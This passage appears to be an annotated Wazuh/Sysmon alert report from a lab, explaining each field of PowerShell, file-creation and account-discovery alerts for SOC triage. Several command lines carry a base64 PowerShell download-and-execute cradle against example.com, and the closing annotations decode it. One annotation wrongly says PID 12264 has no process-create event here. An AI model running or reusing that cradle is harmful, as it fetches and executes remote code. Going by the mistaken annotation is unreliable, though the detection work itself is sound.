Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534217.1049378
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:01.8631189Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282423
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:00.700 ProcessGuid: {94294ddc-bcd0-680a-c60a-000000000e00} ProcessId: 12264 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcc9-680a-b70a-000000000e00} ParentProcessId: 2176 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:00.700
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd0-680a-c60a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12264
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcc9-680a-b70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2176
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:57.909+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:57.909+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  26
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534217.1057445
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:02.0618898Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282424
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:02.054 ProcessGuid: {94294ddc-bcd0-680a-c60a-000000000e00} ProcessId: 12264 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_awmsnad4.ya2.ps1 CreationUtcTime: 2025-04-24 22:36:02.054 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:02.054
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd0-680a-c60a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12264
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_awmsnad4.ya2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:02.054
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:58.078+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:58.078+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534218.1060214
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:03.6012258Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282438
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:03.520 ProcessGuid: {94294ddc-bcd3-680a-ca0a-000000000e00} ProcessId: 13664 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-bcca-680a-c10a-000000000e00} ParentProcessId: 2332 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:03.520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd3-680a-ca0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcca-680a-c10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2332
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:58.268+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:58.268+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  23
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534218.1065269
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:04.4484774Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282461
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:03.117 ProcessGuid: {94294ddc-bcd3-680a-c80a-000000000e00} ProcessId: 11368 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcd0-680a-c60a-000000000e00} ParentProcessId: 12264 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:03.117
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd3-680a-c80a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11368
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
Company from the PE version resource. Same caveat as above.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal file name from the PE resource. If it differs from the file name in Image, the binary was renamed (masquerading). Here they match.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line. -NoProfile with -EncodedCommand is the classic stealth combination. Decode the blob (base64 → UTF‑16LE): IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). Pull https://example.com/test from proxy/DNS logs and check whether anything was actually served.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process; here the user's profile root.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as. The prefix is the computer name (agent.name is Attacker), so Attcker1 is a local account, not a domain one.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Identifies the logon session. Pivot to Security event 4624 with this GUID to see how Attcker1 logged on (console, RDP, network).

data.win.eventdata.logonId:  0x26584
Same logon session as the hex LogonId used by Security events (4624/4634). All three PowerShell events in this report share 0x26584 – one session.

data.win.eventdata.terminalSessionId:  1
Windows session number. 1 = an interactive desktop session (console or RDP); 0 = services.

data.win.eventdata.integrityLevel:  Medium
Token integrity level. Medium = not elevated; High = admin; System = SYSTEM. No privilege escalation at this point.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the Image file. Confirm it is the stock powershell.exe for this build (compare against a known‑good host or your golden image).

data.win.eventdata.parentProcessGuid:  {94294ddc-bcd0-680a-c60a-000000000e00}
GUID of the parent process. Search for it as processGuid to get the parent's own EID 1.

data.win.eventdata.parentProcessId:  12264
Parent PID. 12264 has no EID 1 of its own in this report – find it; it is the earliest known link in the chain.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Parent executable. PowerShell spawning PowerShell with an encoded command is exactly what rule 92057 keys on.

